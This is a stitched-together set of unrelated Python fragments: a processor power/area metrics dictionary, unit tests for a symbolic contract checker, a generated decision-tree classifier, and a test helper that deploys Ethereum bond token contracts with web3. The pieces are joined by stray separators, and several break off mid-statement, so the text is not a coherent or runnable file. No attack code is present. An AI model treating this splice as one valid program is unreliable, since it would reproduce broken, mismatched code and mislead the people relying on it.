'Memory Management Unit/Itlb/Runtime Dynamic': 0.00828113,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.306529,
'Memory Management Unit/Runtime Dynamic': 0.0371301,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.2675,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00388802,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0454017,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming | |
else:
_val = d[s] # type: ignore
return True
self.assertEqual(*check_ok(f))
def test_dict_key_type_union(self) -> None:
def f(d: Dict[Union[int, str], int]) -> Dict:
"""
pre: len(d) == 2
post: not (42 in d and '42' in d)
"""
return d
self.assertEqual(*check_fail(f))
def test_nonuniform_dict_types(self) -> None:
def f(a: Dict[Hashable, int]) -> Dict[Hashable, int]:
"""
pre: len(a) == 1
post: _[0] == 100
"""
b: Dict[Hashable, int] = {0: 100}
b.update(a)
return b
self.assertEqual(*check_fail(f))
def test_dicts_inside_lists(self) -> None:
def f(dicts: List[Dict[int, int]]) -> Dict[int, int]:
"""
pre: len(dicts) <= 1 # to narrow search space (would love to make this larger)
post: len(_) <= len(dicts)
"""
ret = {}
for d in dicts:
ret.update(d)
return ret
self.assertEqual(*check_fail(f))
def test_dicts_inside_lists_with_identity(self) -> None:
# NOTE: the message is a little confusing because repr()
# hides the fact that the identity of the lists is the same.
def f(dicts: List[Dict[int, int]]):
"""
Removes duplicate keys.
pre: len(dicts) == 2
pre: len(dicts[0]) == 1
post: len(dicts[0]) == 1
"""
seen: Set[int] = set()
for d in dicts:
for k in d.keys():
if k in seen:
del d[k]
else:
seen.add(k)
self.assertEqual(*check_fail(f))
def test_consistent_ordering(self) -> None:
def f(symbolic: Dict[int, int]) -> Tuple[List[int], List[int]]:
""" post: _[0] == _[1] """
return (list(symbolic.keys()), list(symbolic.keys()))
self.assertEqual(*check_unknown(f))
def test_ordering_after_mutations(self) -> None:
def f(d: Dict[int, int]) -> Tuple[Tuple[int, int], Tuple[int, int]]:
"""
pre: len(d) == 3
post[d]: _[0] == _[1]
"""
o1, middle, o2 = d.keys()
d[o1] = 42
d[o2] = 42
del d[middle]
n1, n2 = d.keys()
return ((o1, o2), (n1, n2))
self.assertEqual(*check_ok(f))
def test_alternate_mapping_types(self) -> None:
def f(m1: Mapping[int, int], m2: MutableMapping[int, int]) -> int:
"""
pre: 1 in m1 and 2 in m2
post: _ != 10
"""
return m1[1] + m2[2]
self.assertEqual(*check_fail(f))
def test_implicit_conversion_for_keys(self) -> None:
def f(m: Dict[float, float], b: bool, i: int):
"""
post: len(m) >= len(__old__.m)
"""
m[b] = 2.0
m[i] = 3.0
self.assertEqual(*check_ok(f))
if sys.version_info >= (3, 8):
def test_typed_dict_fail(self) -> None:
def f(td: Movie):
''' post: _['year'] != 2020 or _['name'] != "hi"'''
return td
self.assertEqual(*check_fail(f))
class SetsTest(unittest.TestCase):
def test_basic_fail(self) -> None:
def f(a: Set[int], k: int) -> None:
"""
post[a]: k+1 in a
"""
a.add(k)
self.assertEqual(*check_fail(f))
def test_basic_ok(self) -> None:
def f(a: Set[int], k: int) -> None:
"""
post[a]: k in a
"""
a.add(k)
self.assertEqual(*check_ok(f))
def test_union_fail(self) -> None:
def f(a: Set[str], b: Set[str]) -> Set[str]:
"""
pre: len(a) == len(b) == 1 # (just for test performance)
post: all(((i in a) and (i in b)) for i in _)
"""
return a | b
self.assertEqual(*check_fail(f))
def test_union_ok(self) -> None:
def f(a: Set[str], b: Set[str]) -> Set[str]:
"""
post: all(((i in a) or (i in b)) for i in _)
"""
return a | b
self.assertEqual(*check_unknown(f))
def test_contains_different_but_equivalent(self) -> None:
def f(s: Set[Union[int, str]]) -> str:
"""
pre: "foobar" in s
post: (_ + "bar") in s
"""
return "foo"
self.assertEqual(*check_unknown(f))
# The heaprefs + deferred set assumptions make this too expensive.
# TODO: Optimize & re-enable
def TODO_test_subtype_union(self) -> None:
def f(s: Set[Union[int, str]]) -> Set[Union[int, str]]:
""" post: not ((42 in s) and ('42' in s)) """
return s
self.assertEqual(*check_fail(f, AnalysisOptionSet(per_condition_timeout=7.0)))
def test_subset_compare_ok(self) -> None:
# a >= b with {'a': {0.0, 1.0}, 'b': {2.0}}
def f(s1: Set[float], s2: Set[float]) -> bool:
"""
pre: s1 == {0.0, 1.0}
pre: s2 == {2.0}
post: not _
"""
return s1 >= s2
self.assertEqual(*check_ok(f))
def test_set_numeric_promotion(self) -> None:
def f(i: int, s: Set[float]) -> bool:
"""
pre: i == 2
pre: s == {2.0}
post: _
"""
return i in s
self.assertEqual(*check_ok(f))
def test_set_runtime_type_ok(self) -> None:
def f(s: set) -> bool:
""" post: _ """
return True
self.assertEqual(*check_ok(f))
def test_isinstance_check(self) -> None:
def f(s: Set[object]) -> bool:
""" post: _ """
return isinstance(s, set)
self.assertEqual(*check_ok(f))
def test_sets_eq(self) -> None:
def f(a: Set[FrozenSet[int]]) -> object:
"""
pre: a == {frozenset({7}), frozenset({42})}
post: _ in ('{frozenset({7}), frozenset({42})}', '{frozenset({42}), frozenset({7})}')
"""
return repr(a)
self.assertEqual(
*check_ok(
f, AnalysisOptionSet(per_path_timeout=10, per_condition_timeout=10)
)
)
def test_containment(self) -> None:
def f(s: Set[int]) -> int:
"""
pre: len(s) == 2
post: _
"""
i = iter(s)
x = next(i)
y = next(i)
return x != y
self.assertEqual(*check_ok(f))
class FunctionsTest(unittest.TestCase):
def test_hash(self) -> None:
def f(s: str) -> int:
""" post: True """
return hash(s)
self.assertEqual(*check_ok(f))
def test_getattr(self) -> None:
class Otter:
def do_cute_human_things_with_hands(self) -> str:
return "cuteness"
def f(s: str) -> str:
""" post: _ != "cuteness" """
try:
return getattr(Otter(), s)()
except:
return ""
messages = run_checkables(
analyze_function(
f, AnalysisOptionSet(max_iterations=20, per_condition_timeout=5)
)
)
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"false when calling f(s = 'do_cute_human_things_with_hands') (which returns 'cuteness')",
)
class ProtocolsTest(unittest.TestCase):
# TODO: move most of this into a collectionslib_test.py file
def test_hashable_values_fail(self) -> None:
def f(b: bool, i: int, t: Tuple[str, ...], s: FrozenSet[float]) -> int:
""" post: _ % 10 != 0 """
return hash((i, t, s))
self.assertEqual(*check_fail(f))
def test_hashable_values_ok(self) -> None:
def f(a: Tuple[str, int, float, bool], b: Tuple[str, int, float, bool]) -> int:
""" post: _ or not (a == b) """
return hash(a) == hash(b)
self.assertEqual(*check_unknown(f))
def test_symbolic_hashable(self) -> None:
def f(a: Hashable) -> int:
""" post[]: 0 <= _ <= 1 """
return hash(a) % 2
self.assertEqual(*check_ok(f))
def test_symbolic_supports(self) -> None:
def f(
a: SupportsAbs,
f: SupportsFloat,
i: SupportsInt,
r: SupportsRound,
c: SupportsComplex,
b: SupportsBytes,
) -> float:
""" post: _.real <= 0 """
return abs(a) + float(f) + int(i) + round(r) + complex(c) + len(bytes(b))
self.assertEqual(*check_fail(f))
def test_iterable(self) -> None:
T = TypeVar("T")
def f(a: Iterable[T]) -> T:
"""
pre: a
post: _ in a
"""
return next(iter(a))
self.assertEqual(*check_unknown(f))
def test_bare_type(self) -> None:
def f(a: List) -> bool:
"""
pre: a
post: _
"""
return bool(a)
self.assertEqual(*check_ok(f))
class EnumsTest(unittest.TestCase):
def test_enum_identity_matches_equality(self) -> None:
def f(color1: Color, color2: Color) -> bool:
""" post: _ == (color1 is color2) """
return color1 == color2
self.assertEqual(*check_ok(f))
def test_enum_in_container(self) -> None:
def f(colors: List[Color]) -> bool:
""" post: not _ """
return Color.RED in colors and Color.BLUE in colors
self.assertEqual(*check_fail(f))
class TypesTest(unittest.TestCase):
def test_symbolic_types_ok(self) -> None:
def f(typ: Type[SmokeDetector]):
""" post: _ """
return issubclass(typ, SmokeDetector)
self.assertEqual(*check_ok(f))
def test_symbolic_type_can_be_subclass(self) -> None:
def f(typ: Type[Cat]):
""" post: _ == "<class '__main__.Cat'>" """
return str(typ)
# False when the type is instantiated as "BiggerCat":
self.assertEqual(*check_fail(f))
def test_symbolic_types_fail(self) -> None:
def f(typ: Type):
""" post: _ """
return issubclass(typ, str)
self.assertEqual(*check_fail(f))
def test_symbolic_types_without_literal_types(self) -> None:
def f(typ1: Type, typ2: Type, typ3: Type):
""" post: implies(_, issubclass(typ1, typ3)) """
return issubclass(typ2, typ3) and typ2 != typ3
self.assertEqual(
*check_fail(
f, AnalysisOptionSet(max_iterations=60, per_condition_timeout=10)
)
)
def test_instance_creation(self) -> None:
def f(t: Type[Cat]):
""" post: _.size() > 0 """
return t()
self.assertEqual(*check_ok(f))
def test_type_comparison(self) -> None:
def f(t: Type) -> bool:
""" post: _ """
return t == int
self.assertEqual(*check_fail(f))
def test_type_as_bool(self) -> None:
def f(t: Type) -> bool:
""" post: _ """
return bool(t)
self.assertEqual(*check_ok(f))
def test_generic_object_and_type(self) -> None:
def f(thing: object, detector_kind: Type[SmokeDetector]):
""" post: True """
if isinstance(thing, detector_kind):
return thing._is_plugged_in
return False
self.assertEqual(*check_ok(f))
def test_generic_object_equality(self) -> None:
def f(thing: object, i: int):
""" post: not _ """
return thing == i
self.assertEqual(*check_fail(f))
class CallableTest(unittest.TestCase):
def test_symbolic_zero_arg_callable(self) -> None:
def f(size: int, initializer: Callable[[], int]) -> Tuple[int, ...]:
"""
pre: size >= 1
post: _[0] != 707
"""
return tuple(initializer() for _ in range(size))
self.assertEqual(*check_fail(f))
def test_symbolic_one_arg_callable(self) -> None:
def f(size: int, mapfn: Callable[[int], int]) -> Tuple[int, ...]:
"""
pre: size >= 1
post: _[0] != 707
"""
return tuple(mapfn(i) for i in range(size))
self.assertEqual(*check_fail(f))
def test_symbolic_two_arg_callable(self) -> None:
def f(i: int, callable: Callable[[int, int], int]) -> int:
""" post: _ != i """
return callable(i, i)
self.assertEqual(*check_fail(f))
def test_callable_as_bool(self) -> None:
def f(fn: Callable[[int], int]) -> bool:
""" post: _ """
return bool(fn)
self.assertEqual(*check_ok(f))
def test_callable_repr(self) -> None:
def f(f1: Callable[[int], int]) -> int:
""" post: _ != 1234 """
return f1(4)
messages = run_checkables(analyze_function(f))
self.assertEqual(len(messages), 1)
self.assertEqual(
messages[0].message,
"false when calling f(f1 = lambda a: 1234) (which returns 1234)",
)
def | |
{"feature": "Education", "instances": 451, "metric_value": 0.3659, "depth": 8}
if obj[6]>1:
# {"feature": "Restaurant20to50", "instances": 273, "metric_value": 0.3959, "depth": 9}
if obj[10]<=1.0:
# {"feature": "Age", "instances": 157, "metric_value": 0.4229, "depth": 10}
if obj[4]>1:
# {"feature": "Children", "instances": 105, "metric_value": 0.4014, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 63, "metric_value": 0.4263, "depth": 12}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 46, "metric_value": 0.469, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Gender", "instances": 17, "metric_value": 0.2567, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Bar", "instances": 42, "metric_value": 0.3347, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 35, "metric_value": 0.3509, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.1905, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Bar", "instances": 52, "metric_value": 0.4354, "depth": 11}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 30, "metric_value": 0.3873, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 21, "metric_value": 0.3627, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 9, "metric_value": 0.4333, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 22, "metric_value": 0.4886, "depth": 12}
if obj[5]>0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4898, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3571, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Bar", "instances": 116, "metric_value": 0.3455, "depth": 10}
if obj[8]>0.0:
# {"feature": "Children", "instances": 96, "metric_value": 0.3098, "depth": 11}
if obj[5]<=0:
# {"feature": "Age", "instances": 67, "metric_value": 0.3515, "depth": 12}
if obj[4]>1:
# {"feature": "Gender", "instances": 36, "metric_value": 0.2487, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Gender", "instances": 31, "metric_value": 0.4367, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 29, "metric_value": 0.1552, "depth": 12}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 12, "metric_value": 0.3636, "depth": 13}
if obj[4]<=3:
return 'True'
elif obj[4]>3:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Age", "instances": 20, "metric_value": 0.4484, "depth": 11}
if obj[4]<=4:
# {"feature": "Children", "instances": 13, "metric_value": 0.4103, "depth": 12}
if obj[5]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.4333, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Gender", "instances": 7, "metric_value": 0.4898, "depth": 12}
if obj[3]<=1:
# {"feature": "Children", "instances": 7, "metric_value": 0.4898, "depth": 13}
if obj[5]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Age", "instances": 178, "metric_value": 0.3119, "depth": 9}
if obj[4]>0:
# {"feature": "Bar", "instances": 161, "metric_value": 0.3267, "depth": 10}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 155, "metric_value": 0.3162, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 132, "metric_value": 0.2974, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 74, "metric_value": 0.3045, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 58, "metric_value": 0.2807, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 23, "metric_value": 0.4099, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 16, "metric_value": 0.375, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4762, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>3.0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.25, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Gender", "instances": 17, "metric_value": 0.0882, "depth": 10}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.0, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>1:
# {"feature": "Restaurant20to50", "instances": 105, "metric_value": 0.4749, "depth": 8}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 90, "metric_value": 0.4651, "depth": 9}
if obj[6]<=3:
# {"feature": "Children", "instances": 86, "metric_value": 0.4764, "depth": 10}
if obj[5]<=0:
# {"feature": "Age", "instances": 55, "metric_value": 0.4836, "depth": 11}
if obj[4]<=5:
# {"feature": "Bar", "instances": 50, "metric_value": 0.4926, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 29, "metric_value": 0.4932, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Gender", "instances": 21, "metric_value": 0.4805, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>5:
# {"feature": "Bar", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 31, "metric_value": 0.4185, "depth": 11}
if obj[3]>0:
# {"feature": "Bar", "instances": 17, "metric_value": 0.2801, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Age", "instances": 14, "metric_value": 0.2251, "depth": 13}
if obj[4]<=4:
return 'True'
elif obj[4]>4:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Age", "instances": 14, "metric_value": 0.381, "depth": 12}
if obj[4]>0:
# {"feature": "Bar", "instances": 12, "metric_value": 0.4333, "depth": 13}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[10]>2.0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.3636, "depth": 9}
if obj[8]>1.0:
# {"feature": "Age", "instances": 11, "metric_value": 0.2727, "depth": 10}
if obj[4]<=1:
# {"feature": "Education", "instances": 8, "metric_value": 0.3, "depth": 11}
if obj[6]<=2:
# {"feature": "Gender", "instances": 5, "metric_value": 0.4, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]>2:
return 'False'
else: return 'False'
elif obj[4]>1:
return 'True'
else: return 'True'
elif obj[8]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[7]>18.185882392956827:
# {"feature": "Age", "instances": 119, "metric_value": 0.2638, "depth": 6}
if obj[4]<=6:
# {"feature": "Education", "instances": 111, "metric_value": 0.2413, "depth": 7}
if obj[6]>0:
# {"feature": "Time", "instances": 71, "metric_value": 0.2853, "depth": 8}
if obj[1]>0:
# {"feature": "Gender", "instances": 51, "metric_value": 0.3153, "depth": 9}
if obj[3]>0:
# {"feature": "Bar", "instances": 36, "metric_value": 0.1852, "depth": 10}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 15, "metric_value": 0.4286, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.3333, "depth": 12}
if obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4857, "depth": 12}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.3556, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 12, "metric_value": 0.4167, "depth": 11}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.3571, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4048, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Bar", "instances": 20, "metric_value": 0.0857, "depth": 9}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.1905, "depth": 10}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Time", "instances": 40, "metric_value": 0.1234, "depth": 8}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 32, "metric_value": 0.0547, "depth": 9}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2, "depth": 10}
if obj[11]<=0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.32, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=1:
# {"feature": "Bar", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[8]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.3333, "depth": 9}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.3, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[11]<=0:
# {"feature": "Bar", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[8]<=0.0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>6:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 7}
if obj[11]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 8}
if obj[1]>1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 9}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[6]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if | |
<filename>tests/contract_modules.py
"""
Copyright BOOSTRY Co., Ltd.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import json
import time
from web3 import Web3
from web3.middleware import geth_poa_middleware
from eth_utils import to_checksum_address
from app import config
from app.contracts import Contract
from tests.account_config import eth_account
web3 = Web3(Web3.HTTPProvider(config.WEB3_HTTP_PROVIDER))
web3.middleware_onion.inject(geth_poa_middleware, layer=0)
# 名簿用個人情報登録
# NOTE: issuer address に対する情報の公開を行う
def register_personalinfo(invoker, personal_info):
web3.eth.defaultAccount = invoker['account_address']
PersonalInfoContract = Contract.get_contract(
'PersonalInfo', personal_info['address'])
issuer = eth_account['issuer']
encrypted_info = 'some_encrypted_info'
tx_hash = PersonalInfoContract.functions.register(
issuer['account_address'], encrypted_info). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 決済用銀行口座情報登録
def register_payment_gateway(invoker, payment_gateway):
PaymentGatewayContract = Contract.get_contract(
'PaymentGateway', payment_gateway['address'])
# 1) 登録 from Invoker
web3.eth.defaultAccount = invoker['account_address']
agent = eth_account['agent']
encrypted_info = 'some_encrypted_info'
tx_hash = PaymentGatewayContract.functions.register(
agent['account_address'], encrypted_info). \
transact({'from': invoker['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# 2) 認可 from Agent
web3.eth.defaultAccount = agent['account_address']
tx_hash = PaymentGatewayContract.functions.approve(invoker['account_address']). \
transact({'from': agent['account_address'], 'gas': 4000000})
web3.eth.waitForTransactionReceipt(tx_hash)
# トークン移転
def transfer_token(token_contract, from_address, to_address, amount):
token_contract.functions.transfer(
to_address,
amount
).transact({
'from': from_address
})
'''
Straight Bond Token (普通社債)
'''
# 債券トークンの発行
def issue_bond_token(invoker, attribute):
web3.eth.defaultAccount = invoker['account_address']
interestPaymentDate = json.dumps(
{
'interestPaymentDate1': attribute['interestPaymentDate1'],
'interestPaymentDate2': attribute['interestPaymentDate2'],
'interestPaymentDate3': attribute['interestPaymentDate3'],
'interestPaymentDate4': attribute['interestPaymentDate4'],
'interestPaymentDate5': attribute['interestPaymentDate5'],
'interestPaymentDate6': attribute['interestPaymentDate6'],
'interestPaymentDate7': attribute['interestPaymentDate7'],
'interestPaymentDate8': attribute['interestPaymentDate8'],
'interestPaymentDate9': attribute['interestPaymentDate9'],
'interestPaymentDate10': attribute['interestPaymentDate10'],
'interestPaymentDate11': attribute['interestPaymentDate11'],
'interestPaymentDate12': attribute['interestPaymentDate12'],
}
)
arguments = [
attribute['name'], attribute['symbol'], attribute['totalSupply'],
attribute['faceValue'],
attribute['redemptionDate'], attribute['redemptionValue'],
attribute['returnDate'], attribute['returnAmount'],
attribute['purpose']
]
contract_address, abi = Contract.deploy_contract(
'IbetStraightBond',
arguments,
invoker['account_address']
)
# その他項目の更新
TokenContract = Contract.get_contract('IbetStraightBond', contract_address)
TokenContract.functions.setTradableExchange(attribute['tradableExchange']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setInterestRate(attribute['interestRate']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setInterestPaymentDate(interestPaymentDate). \
transact({'from': invoker['account_address'], 'gas': 4000000})
TokenContract.functions.setMemo(attribute['memo']). \
transact({'from': invoker['account_address'], 'gas': 4000000})
